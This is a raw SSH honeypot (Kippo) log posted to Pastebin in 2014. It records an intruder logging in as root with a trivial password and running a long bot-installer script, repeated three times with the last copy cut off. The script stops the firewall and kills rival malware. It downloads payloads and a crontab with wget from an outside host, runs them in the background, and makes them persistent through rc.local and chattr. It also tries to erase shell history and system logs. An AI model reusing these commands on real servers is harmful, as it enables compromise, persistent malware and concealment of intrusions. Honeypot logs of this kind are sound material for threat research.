API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Oct 13th, 2014
233
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 25.93 KB | None | 0 0
raw download clone embed print report
  1. 2014-10-13 10:33:31-0400 [SSHService ssh-userauth on HoneyPotTransport,550,61.174.50.134] login attempt [root/password] succeeded
  2. 2014-10-13 10:33:31-0400 [SSHService ssh-userauth on HoneyPotTransport,550,61.174.50.134] root authenticated with keyboard-interactive
  3. 2014-10-13 10:33:31-0400 [SSHService ssh-userauth on HoneyPotTransport,550,61.174.50.134] starting service ssh-connection
  4. 2014-10-13 10:33:31-0400 [SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] got channel session request
  5. 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] channel open
  6. 2014-10-13 10:33:31-0400 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 61.174.50.134:40011 (x.x.x.x) [session: 551]
  7. 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] executing command "/etc/init.d/iptables stop
  8. echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  9. echo "nameserver 8.8.4.4" >> /etc/resolv.conf
  10. apt-get -y install wget
  11. yum -y install wget
  12. chmod 7777 / etc
  13. killall -9 .IptabLes
  14. killall -9 nfsd4
  15. killall -9 profild.key
  16. cd /etc;rm -rf dir fake.cfg
  17. killall -9 nfsd
  18. killall -9 DDosl
  19. killall -9 lengchao32
  20. killall -9 b26
  21. killall -9 khelper
  22. killall -9 Bill
  23. killall -9 n26
  24. killall -9 007
  25. killall -9 codelove
  26. killall -9 32
  27. killall -9 m32
  28. killall -9 m64
  29. killall -9 64
  30. killall -9 83BOT
  31. killall -9 82BOT
  32. killall -9 dos64
  33. killall -9 dos32
  34. killall -9 new6
  35. killall -9 new4
  36. killall -9 node24
  37. killall -9 mimi
  38. killall -9 nodeJR-1
  39. killall -9 freeBSD
  40. killall -9 ksapdd
  41. killall -9 106
  42. killall -9 09
  43. killall -9 xsw
  44. killall -9 syslogd
  45. killall -9 skysapdd
  46. killall -9 cupsddd
  47. killall -9 ksapd
  48. killall -9 atddd
  49. killall -9 xfsdxd
  50. killall -9 sfewfesfs
  51. killall -9 gfhjrtfyhuf
  52. killall -9 rewgtf3er4t
  53. killall -9 fdsfsfvff
  54. killall -9 smarvtd
  55. killall -9 whitptabil
  56. killall -9 gdmorpen
  57. cd /etc;chattr -i 66
  58. cd /root; chmod 7777 / etc
  59. killall -9 minerd
  60. killall -9 syn
  61. killall -9 joudckfr
  62. killall -9 www
  63. killall -9 log
  64. killall -9 .IptabLes
  65. killall -9 .IptabLex
  66. killall -9 .Mm2
  67. killall -9 acpid
  68. killall -9 m64
  69. killall -9 ./QQ
  70. killall -9 aabb
  71. killall -9 g3
  72. killall -9 S99local
  73. killall -9 3
  74. killall -9 pm
  75. killall -9 qweasd
  76. killall -9 tangtang
  77. killall -9 imap-login
  78. killall -9 xudp
  79. killall -9 sshpa
  80. killall -9 008
  81. killall -9 txma
  82. killall -9 mrdos64.b00
  83. killall -9 mrdos32.b00
  84. killall -9 kkpklp
  85. killall -9 kiilp
  86. killall -9 xin1
  87. killall -9 jibateng
  88. killall -9 syscore.sh
  89. killall -9 syscore.sh
  90. killall -9 syscore.sh
  91. killall -9 .mimeo
  92. killall -9 .mimeo
  93. killall -9 .mimeo
  94. killall -9 .mimeop
  95. killall -9 .task1
  96. killall -9 .mimeop
  97. killall -9 .IptabLes
  98. killall -9 .IptabLex
  99. killall -9 .IptabLes
  100. killall -9 .IptabLex
  101. killall -9 .IptabLes
  102. killall -9 .IptabLex
  103. killall -9 .IptabLes
  104. killall -9 .IptabLex
  105. cd /root;rm -rf dir nohup.out
  106. cd /etc;rm -rf dir fake.cfg
  107. cd /etc;rm -rf dir cupsddd.*
  108. cd /etc;rm -rf dir atddd.*
  109. cd /etc;rm -rf dir ksapdd.*
  110. cd /etc;rm -rf dir kysapdd.*
  111. cd /etc;rm -rf dir sksapdd.*
  112. cd /etc;rm -rf dir skysapdd.*
  113. cd /etc;rm -rf dir xfsdxd.*
  114. cd /etc;rm -rf dir fake.cfg
  115. cd /etc;rm -rf dir cupsdd.*
  116. cd /etc;rm -rf dir atdd.*
  117. cd /etc;rm -rf dir ksapd.*
  118. cd /etc;rm -rf dir kysapd.*
  119. cd /etc;rm -rf dir sksapd.*
  120. cd /etc;rm -rf dir skysapd.*
  121. cd /etc;rm -rf dir xfsdx.*
  122. cd /etc;rm -rf dir sfewfesfs
  123. cd /etc;rm -rf dir gfhjrtfyhuf
  124. cd /etc;rm -rf dir rewgtf3er4t
  125. cd /etc;rm -rf dir fdsfsfvff
  126. cd /etc;rm -rf dir smarvtd
  127. cd /etc;rm -rf dir whitptabil
  128. cd /etc;rm -rf dir gdmorpen
  129. cd /etc;rm -rf dir sfewfesfs.*
  130. cd /etc;rm -rf dir gfhjrtfyhuf.*
  131. cd /etc;rm -rf dir rewgtf3er4t.*
  132. cd /etc;rm -rf dir fdsfsfvff.*
  133. cd /etc;rm -rf dir smarvtd.*
  134. cd /etc;rm -rf dir whitptabil.*
  135. cd /etc;rm -rf dir gdmorpen.*
  136. cd /etc;rm -rf dir nhgbhhj.*
  137. cd /tmp;rm -rf dir 1.*
  138. cd /tmp;rm -rf dir 2.*
  139. cd /tmp;rm -rf dir 3.*
  140. cd /tmp;rm -rf dir 4.*
  141. cd /tmp;rm -rf dir 5.*
  142. cd /tmp;rm -rf dir jdhe
  143. cd /tmp;rm -rf dir jdhe.*
  144. cd /var/spool/cron; rm -rf dir root.*
  145. cd /var/spool/cron; rm -rf dir root
  146. cd /var/spool/cron/crontabs; rm -rf dir root.*
  147. cd /var/spool/cron/crontabs; rm -rf dir root
  148. cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root
  149. cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root
  150. yes|mv /tmp/root /var/spool/cron
  151. yes|mv /tmp/root /var/spool/cron/crontabs
  152. cd /tmp;wget -c http://www.frade8c.com:9162/jdhe
  153. cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs
  154. cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
  155. cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t
  156. cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff
  157. cd /etc;wget -c http://www.frade8c.com:9162/smarvtd
  158. cd /etc;wget -c http://www.frade8c.com:9162/whitptabil
  159. cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen
  160. cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj
  161. cd /etc;wget -c http://www.frade8c.com:9162/byv832
  162. cd /tmp;chmod 7777 jdhe
  163. cd /etc;chmod 7777 nhgbhhj
  164. cd /etc;chmod 7777 byv832
  165. cd /etc;chmod 7777 sfewfesfs
  166. cd /etc;chmod 7777 gfhjrtfyhuf
  167. cd /etc;chmod 7777 rewgtf3er4t
  168. cd /etc;chmod 7777 fdsfsfvff
  169. cd /etc;chmod 7777 smarvtd
  170. cd /etc;chmod 7777 whitptabil
  171. cd /etc;chmod 7777 gdmorpen
  172. cd /tmp;chmod 7777 nhgbhhj
  173. cd /tmp;chmod 7777 byv832
  174. cd /tmp;chmod 7777 sfewfesfs
  175. cd /tmp;chmod 7777 gfhjrtfyhuf
  176. cd /tmp;chmod 7777 rewgtf3er4t
  177. cd /tmp;chmod 7777 fdsfsfvff
  178. cd /tmp;chmod 7777 smarvtd
  179. cd /tmp;chmod 7777 whitptabil
  180. cd /tmp;chmod 7777 gdmorpen
  181. cd /tmp;./jdhe
  182. nohup /etc/sfewfesfs > /dev/null 2>&1&
  183. nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
  184. nohup /etc/rewgtf3er4t > /dev/null 2>&1&
  185. nohup /etc/fdsfsfvff > /dev/null 2>&1&
  186. nohup /etc/smarvtd > /dev/null 2>&1&
  187. nohup /etc/whitptabil > /dev/null 2>&1&
  188. nohup /etc/gdmorpen > /dev/null 2>&1&
  189. nohup /etc/nhgbhhj > /dev/null 2>&1&
  190. nohup /etc/byv832 > /dev/null 2>&1&
  191. nohup /tmp/sfewfesfs > /dev/null 2>&1&
  192. nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1&
  193. nohup /tmp/rewgtf3er4t > /dev/null 2>&1&
  194. nohup /tmp/fdsfsfvff > /dev/null 2>&1&
  195. nohup /tmp/smarvtd > /dev/null 2>&1&
  196. nohup /tmp/whitptabil > /dev/null 2>&1&
  197. nohup /tmp/gdmorpen > /dev/null 2>&1&
  198. nohup /tmp/nhgbhhj > /dev/null 2>&1&
  199. nohup /tmp/byv832 > /dev/null 2>&1&
  200. echo "cd /tmp;./sfewfesfs" >> /etc/rc.local
  201. echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local
  202. echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local
  203. echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local
  204. echo "cd /tmp;./smarvtd" >> /etc/rc.local
  205. echo "cd /tmp;./whitptabil" >> /etc/rc.local
  206. echo "cd /tmp;./gdmorpen" >> /etc/rc.local
  207. echo "cd /etc;./sfewfesfs" >> /etc/rc.local
  208. echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local
  209. echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local
  210. echo "cd /etc;./fdsfsfvff" >> /etc/rc.local
  211. echo "cd /etc;./smarvtd" >> /etc/rc.local
  212. echo "cd /etc;./whitptabil" >> /etc/rc.local
  213. echo "cd /etc;./gdmorpen" >> /etc/rc.local
  214. echo "unset MAILCHECK" >> /etc/profile
  215. cd /etc;chattr +i sfewfesfs
  216. rm -rf /root/.bash_history
  217. touch /root/.bash_history
  218. history -r
  219. cd /var/log > dmesg
  220. cd /var/log > auth.log
  221. cd /var/log > alternatives.log
  222. cd /var/log > boot.log
  223. cd /var/log > btmp
  224. cd /var/log > cron
  225. cd /var/log > cups
  226. cd /var/log > daemon.log
  227. cd /var/log > dpkg.log
  228. cd /var/log > faillog
  229. cd /var/log > kern.log
  230. cd /var/log > lastlog
  231. cd /var/log > maillog
  232. cd /var/log > user.log
  233. cd /var/log > Xorg.x.log
  234. cd /var/log > anaconda.log
  235. cd /var/log > yum.log
  236. cd /var/log > secure
  237. cd /var/log > wtmp
  238. cd /var/log > utmp
  239. cd /var/log > messages
  240. cd /var/log > spooler
  241. cd /var/log > sudolog
  242. cd /var/log > aculog
  243. cd /var/log > access-log
  244. cd /root > .bash_history
  245. history -c"
  246. 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] exec command: "/etc/init.d/iptables stop
  247. echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  248. echo "nameserver 8.8.4.4" >> /etc/resolv.conf
  249. apt-get -y install wget
  250. yum -y install wget
  251. chmod 7777 / etc
  252. killall -9 .IptabLes
  253. killall -9 nfsd4
  254. killall -9 profild.key
  255. cd /etc;rm -rf dir fake.cfg
  256. killall -9 nfsd
  257. killall -9 DDosl
  258. killall -9 lengchao32
  259. killall -9 b26
  260. killall -9 khelper
  261. killall -9 Bill
  262. killall -9 n26
  263. killall -9 007
  264. killall -9 codelove
  265. killall -9 32
  266. killall -9 m32
  267. killall -9 m64
  268. killall -9 64
  269. killall -9 83BOT
  270. killall -9 82BOT
  271. killall -9 dos64
  272. killall -9 dos32
  273. killall -9 new6
  274. killall -9 new4
  275. killall -9 node24
  276. killall -9 mimi
  277. killall -9 nodeJR-1
  278. killall -9 freeBSD
  279. killall -9 ksapdd
  280. killall -9 106
  281. killall -9 09
  282. killall -9 xsw
  283. killall -9 syslogd
  284. killall -9 skysapdd
  285. killall -9 cupsddd
  286. killall -9 ksapd
  287. killall -9 atddd
  288. killall -9 xfsdxd
  289. killall -9 sfewfesfs
  290. killall -9 gfhjrtfyhuf
  291. killall -9 rewgtf3er4t
  292. killall -9 fdsfsfvff
  293. killall -9 smarvtd
  294. killall -9 whitptabil
  295. killall -9 gdmorpen
  296. cd /etc;chattr -i 66
  297. cd /root; chmod 7777 / etc
  298. killall -9 minerd
  299. killall -9 syn
  300. killall -9 joudckfr
  301. killall -9 www
  302. killall -9 log
  303. killall -9 .IptabLes
  304. killall -9 .IptabLex
  305. killall -9 .Mm2
  306. killall -9 acpid
  307. killall -9 m64
  308. killall -9 ./QQ
  309. killall -9 aabb
  310. killall -9 g3
  311. killall -9 S99local
  312. killall -9 3
  313. killall -9 pm
  314. killall -9 qweasd
  315. killall -9 tangtang
  316. killall -9 imap-login
  317. killall -9 xudp
  318. killall -9 sshpa
  319. killall -9 008
  320. killall -9 txma
  321. killall -9 mrdos64.b00
  322. killall -9 mrdos32.b00
  323. killall -9 kkpklp
  324. killall -9 kiilp
  325. killall -9 xin1
  326. killall -9 jibateng
  327. killall -9 syscore.sh
  328. killall -9 syscore.sh
  329. killall -9 syscore.sh
  330. killall -9 .mimeo
  331. killall -9 .mimeo
  332. killall -9 .mimeo
  333. killall -9 .mimeop
  334. killall -9 .task1
  335. killall -9 .mimeop
  336. killall -9 .IptabLes
  337. killall -9 .IptabLex
  338. killall -9 .IptabLes
  339. killall -9 .IptabLex
  340. killall -9 .IptabLes
  341. killall -9 .IptabLex
  342. killall -9 .IptabLes
  343. killall -9 .IptabLex
  344. cd /root;rm -rf dir nohup.out
  345. cd /etc;rm -rf dir fake.cfg
  346. cd /etc;rm -rf dir cupsddd.*
  347. cd /etc;rm -rf dir atddd.*
  348. cd /etc;rm -rf dir ksapdd.*
  349. cd /etc;rm -rf dir kysapdd.*
  350. cd /etc;rm -rf dir sksapdd.*
  351. cd /etc;rm -rf dir skysapdd.*
  352. cd /etc;rm -rf dir xfsdxd.*
  353. cd /etc;rm -rf dir fake.cfg
  354. cd /etc;rm -rf dir cupsdd.*
  355. cd /etc;rm -rf dir atdd.*
  356. cd /etc;rm -rf dir ksapd.*
  357. cd /etc;rm -rf dir kysapd.*
  358. cd /etc;rm -rf dir sksapd.*
  359. cd /etc;rm -rf dir skysapd.*
  360. cd /etc;rm -rf dir xfsdx.*
  361. cd /etc;rm -rf dir sfewfesfs
  362. cd /etc;rm -rf dir gfhjrtfyhuf
  363. cd /etc;rm -rf dir rewgtf3er4t
  364. cd /etc;rm -rf dir fdsfsfvff
  365. cd /etc;rm -rf dir smarvtd
  366. cd /etc;rm -rf dir whitptabil
  367. cd /etc;rm -rf dir gdmorpen
  368. cd /etc;rm -rf dir sfewfesfs.*
  369. cd /etc;rm -rf dir gfhjrtfyhuf.*
  370. cd /etc;rm -rf dir rewgtf3er4t.*
  371. cd /etc;rm -rf dir fdsfsfvff.*
  372. cd /etc;rm -rf dir smarvtd.*
  373. cd /etc;rm -rf dir whitptabil.*
  374. cd /etc;rm -rf dir gdmorpen.*
  375. cd /etc;rm -rf dir nhgbhhj.*
  376. cd /tmp;rm -rf dir 1.*
  377. cd /tmp;rm -rf dir 2.*
  378. cd /tmp;rm -rf dir 3.*
  379. cd /tmp;rm -rf dir 4.*
  380. cd /tmp;rm -rf dir 5.*
  381. cd /tmp;rm -rf dir jdhe
  382. cd /tmp;rm -rf dir jdhe.*
  383. cd /var/spool/cron; rm -rf dir root.*
  384. cd /var/spool/cron; rm -rf dir root
  385. cd /var/spool/cron/crontabs; rm -rf dir root.*
  386. cd /var/spool/cron/crontabs; rm -rf dir root
  387. cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root
  388. cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root
  389. yes|mv /tmp/root /var/spool/cron
  390. yes|mv /tmp/root /var/spool/cron/crontabs
  391. cd /tmp;wget -c http://www.frade8c.com:9162/jdhe
  392. cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs
  393. cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
  394. cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t
  395. cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff
  396. cd /etc;wget -c http://www.frade8c.com:9162/smarvtd
  397. cd /etc;wget -c http://www.frade8c.com:9162/whitptabil
  398. cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen
  399. cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj
  400. cd /etc;wget -c http://www.frade8c.com:9162/byv832
  401. cd /tmp;chmod 7777 jdhe
  402. cd /etc;chmod 7777 nhgbhhj
  403. cd /etc;chmod 7777 byv832
  404. cd /etc;chmod 7777 sfewfesfs
  405. cd /etc;chmod 7777 gfhjrtfyhuf
  406. cd /etc;chmod 7777 rewgtf3er4t
  407. cd /etc;chmod 7777 fdsfsfvff
  408. cd /etc;chmod 7777 smarvtd
  409. cd /etc;chmod 7777 whitptabil
  410. cd /etc;chmod 7777 gdmorpen
  411. cd /tmp;chmod 7777 nhgbhhj
  412. cd /tmp;chmod 7777 byv832
  413. cd /tmp;chmod 7777 sfewfesfs
  414. cd /tmp;chmod 7777 gfhjrtfyhuf
  415. cd /tmp;chmod 7777 rewgtf3er4t
  416. cd /tmp;chmod 7777 fdsfsfvff
  417. cd /tmp;chmod 7777 smarvtd
  418. cd /tmp;chmod 7777 whitptabil
  419. cd /tmp;chmod 7777 gdmorpen
  420. cd /tmp;./jdhe
  421. nohup /etc/sfewfesfs > /dev/null 2>&1&
  422. nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
  423. nohup /etc/rewgtf3er4t > /dev/null 2>&1&
  424. nohup /etc/fdsfsfvff > /dev/null 2>&1&
  425. nohup /etc/smarvtd > /dev/null 2>&1&
  426. nohup /etc/whitptabil > /dev/null 2>&1&
  427. nohup /etc/gdmorpen > /dev/null 2>&1&
  428. nohup /etc/nhgbhhj > /dev/null 2>&1&
  429. nohup /etc/byv832 > /dev/null 2>&1&
  430. nohup /tmp/sfewfesfs > /dev/null 2>&1&
  431. nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1&
  432. nohup /tmp/rewgtf3er4t > /dev/null 2>&1&
  433. nohup /tmp/fdsfsfvff > /dev/null 2>&1&
  434. nohup /tmp/smarvtd > /dev/null 2>&1&
  435. nohup /tmp/whitptabil > /dev/null 2>&1&
  436. nohup /tmp/gdmorpen > /dev/null 2>&1&
  437. nohup /tmp/nhgbhhj > /dev/null 2>&1&
  438. nohup /tmp/byv832 > /dev/null 2>&1&
  439. echo "cd /tmp;./sfewfesfs" >> /etc/rc.local
  440. echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local
  441. echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local
  442. echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local
  443. echo "cd /tmp;./smarvtd" >> /etc/rc.local
  444. echo "cd /tmp;./whitptabil" >> /etc/rc.local
  445. echo "cd /tmp;./gdmorpen" >> /etc/rc.local
  446. echo "cd /etc;./sfewfesfs" >> /etc/rc.local
  447. echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local
  448. echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local
  449. echo "cd /etc;./fdsfsfvff" >> /etc/rc.local
  450. echo "cd /etc;./smarvtd" >> /etc/rc.local
  451. echo "cd /etc;./whitptabil" >> /etc/rc.local
  452. echo "cd /etc;./gdmorpen" >> /etc/rc.local
  453. echo "unset MAILCHECK" >> /etc/profile
  454. cd /etc;chattr +i sfewfesfs
  455. rm -rf /root/.bash_history
  456. touch /root/.bash_history
  457. history -r
  458. cd /var/log > dmesg
  459. cd /var/log > auth.log
  460. cd /var/log > alternatives.log
  461. cd /var/log > boot.log
  462. cd /var/log > btmp
  463. cd /var/log > cron
  464. cd /var/log > cups
  465. cd /var/log > daemon.log
  466. cd /var/log > dpkg.log
  467. cd /var/log > faillog
  468. cd /var/log > kern.log
  469. cd /var/log > lastlog
  470. cd /var/log > maillog
  471. cd /var/log > user.log
  472. cd /var/log > Xorg.x.log
  473. cd /var/log > anaconda.log
  474. cd /var/log > yum.log
  475. cd /var/log > secure
  476. cd /var/log > wtmp
  477. cd /var/log > utmp
  478. cd /var/log > messages
  479. cd /var/log > spooler
  480. cd /var/log > sudolog
  481. cd /var/log > aculog
  482. cd /var/log > access-log
  483. cd /root > .bash_history
  484. history -c"
  485. 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] Opening TTY log: log/tty/20141013-103331-7357.log
  486. 2014-10-13 10:33:33-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] Running exec command "/etc/init.d/iptables stop
  487. echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  488. echo "nameserver 8.8.4.4" >> /etc/resolv.conf
  489. apt-get -y install wget
  490. yum -y install wget
  491. chmod 7777 / etc
  492. killall -9 .IptabLes
  493. killall -9 nfsd4
  494. killall -9 profild.key
  495. cd /etc;rm -rf dir fake.cfg
  496. killall -9 nfsd
  497. killall -9 DDosl
  498. killall -9 lengchao32
  499. killall -9 b26
  500. killall -9 khelper
  501. killall -9 Bill
  502. killall -9 n26
  503. killall -9 007
  504. killall -9 codelove
  505. killall -9 32
  506. killall -9 m32
  507. killall -9 m64
  508. killall -9 64
  509. killall -9 83BOT
  510. killall -9 82BOT
  511. killall -9 dos64
  512. killall -9 dos32
  513. killall -9 new6
  514. killall -9 new4
  515. killall -9 node24
  516. killall -9 mimi
  517. killall -9 nodeJR-1
  518. killall -9 freeBSD
  519. killall -9 ksapdd
  520. killall -9 106
  521. killall -9 09
  522. killall -9 xsw
  523. killall -9 syslogd
  524. killall -9 skysapdd
  525. killall -9 cupsddd
  526. killall -9 ksapd
  527. killall -9 atddd
  528. killall -9 xfsdxd
  529. killall -9 sfewfesfs
  530. killall -9 gfhjrtfyhuf
  531. killall -9 rewgtf3er4t
  532. killall -9 fdsfsfvff
  533. killall -9 smarvtd
  534. killall -9 whitptabil
  535. killall -9 gdmorpen
  536. cd /etc;chattr -i 66
  537. cd /root; chmod 7777 / etc
  538. killall -9 minerd
  539. killall -9 syn
  540. killall -9 joudckfr
  541. killall -9 www
  542. killall -9 log
  543. killall -9 .IptabLes
  544. killall -9 .IptabLex
  545. killall -9 .Mm2
  546. killall -9 acpid
  547. killall -9 m64
  548. killall -9 ./QQ
  549. killall -9 aabb
  550. killall -9 g3
  551. killall -9 S99local
  552. killall -9 3
  553. killall -9 pm
  554. killall -9 qweasd
  555. killall -9 tangtang
  556. killall -9 imap-login
  557. killall -9 xudp
  558. killall -9 sshpa
  559. killall -9 008
  560. killall -9 txma
  561. killall -9 mrdos64.b00
  562. killall -9 mrdos32.b00
  563. killall -9 kkpklp
  564. killall -9 kiilp
  565. killall -9 xin1
  566. killall -9 jibateng
  567. killall -9 syscore.sh
  568. killall -9 syscore.sh
  569. killall -9 syscore.sh
  570. killall -9 .mimeo
  571. killall -9 .mimeo
  572. killall -9 .mimeo
  573. killall -9 .mimeop
  574. killall -9 .task1
  575. killall -9 .mimeop
  576. killall -9 .IptabLes
  577. killall -9 .IptabLex
  578. killall -9 .IptabLes
  579. killall -9 .IptabLex
  580. killall -9 .IptabLes
  581. killall -9 .IptabLex
  582. killall -9 .IptabLes
  583. killall -9 .IptabLex
  584. cd /root;rm -rf dir nohup.out
  585. cd /etc;rm -rf dir fake.cfg
  586. cd /etc;rm -rf dir cupsddd.*
  587. cd /etc;rm -rf dir atddd.*
  588. cd /etc;rm -rf dir ksapdd.*
  589. cd /etc;rm -rf dir kysapdd.*
  590. cd /etc;rm -rf dir sksapdd.*
  591. cd /etc;rm -rf dir skysapdd.*
  592. cd /etc;rm -rf dir xfsdxd.*
  593. cd /etc;rm -rf dir fake.cfg
  594. cd /etc;rm -rf dir cupsdd.*
  595. cd /etc;rm -rf dir atdd.*
  596. cd /etc;rm -rf dir ksapd.*
  597. cd /etc;rm -rf dir kysapd.*
  598. cd /etc;rm -rf dir sksapd.*
  599. cd /etc;rm -rf dir skysapd.*
  600. cd /etc;rm -rf dir xfsdx.*
  601. cd /etc;rm -rf dir sfewfesfs
  602. cd /etc;rm -rf dir gfhjrtfyhuf
  603. cd /etc;rm -rf dir rewgtf3er4t
  604. cd /etc;rm -rf dir fdsfsfvff
  605. cd /etc;rm -rf dir smarvtd
  606. cd /etc;rm -rf dir whitptabil
  607. cd /etc;rm -rf dir gdmorpen
  608. cd /etc;rm -rf dir sfewfesfs.*
  609. cd /etc;rm -rf dir gfhjrtfyhuf.*
  610. cd /etc;rm -rf dir rewgtf3er4t.*
  611. cd /etc;rm -rf dir fdsfsfvff.*
  612. cd /etc;rm -rf dir smarvtd.*
  613. cd /etc;rm -rf dir whitptabil.*
  614. cd /etc;rm -rf dir gdmorpen.*
  615. cd /etc;rm -rf dir nhgbhhj.*
  616. cd /tmp;rm -rf dir 1.*
  617. cd /tmp;rm -rf dir 2.*
  618. cd /tmp;rm -rf dir 3.*
  619. cd /tmp;rm -rf dir 4.*
  620. cd /tmp;rm -rf dir 5.*
  621. cd /tmp;rm -rf dir jdhe
  622. cd /tmp;rm -rf dir jdhe.*
  623. cd /var/spool/cron; rm -rf dir root.*
  624. cd /var/spool/cron; rm -rf dir root
  625. cd /var/spool/cron/crontabs; rm -rf dir root.*
  626. cd /var/spool/cron/crontabs; rm -rf dir root
  627. cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root
  628. cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root
  629. yes|mv /tmp/root /var/spool/cron
  630. yes|mv /tmp/root /var/spool/cron/crontabs
  631. cd /tmp;wget -c http://www.frade8c.com:9162/jdhe
  632. cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs
  633. cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
  634. cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t
  635. cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff
  636. cd /etc;wget -c http://www.frade8c.com:9162/smarvtd
  637. cd /etc;wget -c http://www.frade8c.com:9162/whitptabil
  638. cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen
  639. cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj
  640. cd /etc;wget -c http://www.frade8c.com:9162/byv832
  641. cd /tmp;chmod 7777 jdhe
  642. cd /etc;chmod 7777 nhgbhhj
  643. cd /etc;chmod 7777 byv832
  644. cd /etc;chmod 7777 sfewfesfs
  645. cd /etc;chmod 7777 gfhjrtfyhuf
  646. cd /etc;chmod 7777 rewgtf3er4t
  647. cd /etc;chmod 7777 fdsfsfvff
  648. cd /etc;chmod 7777 smarvtd
  649. cd /etc;chmod 7777 whitptabil
  650. cd /etc;chmod 7777 gdmorpen
  651. cd /tmp;chmod 7777 nhgbhhj
  652. cd /tmp;chmod 7777 byv832
  653. cd /tmp;chmod 7777 sfewfesfs
  654. cd /tmp;chmod 7777 gfhjrtfyhuf
  655. cd /tmp;chmod 7777 rewgtf3er4t
  656. cd /tmp;chmod 7777 fdsfsfvff
  657. cd /tmp;chmod 7777 smarvtd
  658. cd /tmp;chmod 7777 whitptabil
  659. cd /tmp;chmod 7777 gdmorpen
  660. cd /tmp;./jdhe
  661. nohup /etc/sfewfesfs > /dev/null 2>&1&
  662. nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
  663. nohup /etc/rewgtf3er4t > /dev/null 2>&1&
  664. nohup /etc/fdsfsfvff > /dev/null 2>&1&
  665. nohup /etc/smarvtd > /dev/null 2>&1&
  666. nohup /etc/whitptabil > /dev/null 2>&1&
  667. nohup /etc/gdmorpen > /dev/null 2>&1&
  668. nohup /etc/nhgbhhj > /dev/null 2>&1&
  669. nohup /etc/byv832 > /dev/null 2>&1&
  670. nohup /tmp/sfewfesfs > /dev/null 2>&1&
  671. nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1&
  672. nohup /tmp/rewgtf3er4t > /dev/null 2>&1&
  673. nohup /tmp/fdsfsfvff > /dev/null 2>&1&
  674. nohup /tmp/smarvtd > /dev/null 2>&1&
  675. nohup /tmp/whitptabil > /dev/null 2>&1&
  676. nohup /tmp/gdmorpen > /dev/null 2>&1&
  677. nohup /tmp/nhgbhhj > /dev/null 2>&1&
  678. nohup /tmp/byv832 > /dev/null 2>&1&
  679. echo "cd /tmp;./sfewfesfs" >> /etc/rc.local
  680. echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local
  681. echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local
  682. echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local
  683. echo "cd /tmp;./smarvtd" >> /etc/rc.local
  684. echo "cd /tmp;./whitptabil" >> /etc/rc.local
  685. echo "cd /tmp;./gdmorpen" >> /etc/rc.local
  686. echo "cd /etc;./sfewfesfs" >> /etc/rc.local
  687. echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local
  688. echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local
  689. echo "cd /etc;./fdsfsfvff" >> /etc/rc.local
  690. echo "cd /etc;./smarvtd" >> /etc/rc.local
  691. echo "cd /etc;./whitptabil" >> /etc/rc.local
  692. echo "cd /etc;./gdmorpen" >> /etc/rc.local
  693. echo "unset MAILCHECK" >> /etc/profile
  694. cd /etc;chattr +i sfewfesfs
  695. rm -rf /root/.bash_history
  696. touch /root/.bash_history
  697. history -r
  698. cd /var/log > dmesg
  699. cd /var/log > auth.log
  700. cd /var/log > alternatives.log
  701. cd /var/log > boot.log
  702. cd /var/log > btmp
  703. cd /var/log > cron
  704. cd /var/log > cups
  705. cd /var/log > daemon.log
  706. cd /var/log > dpkg.log
  707. cd /var/log > faillog
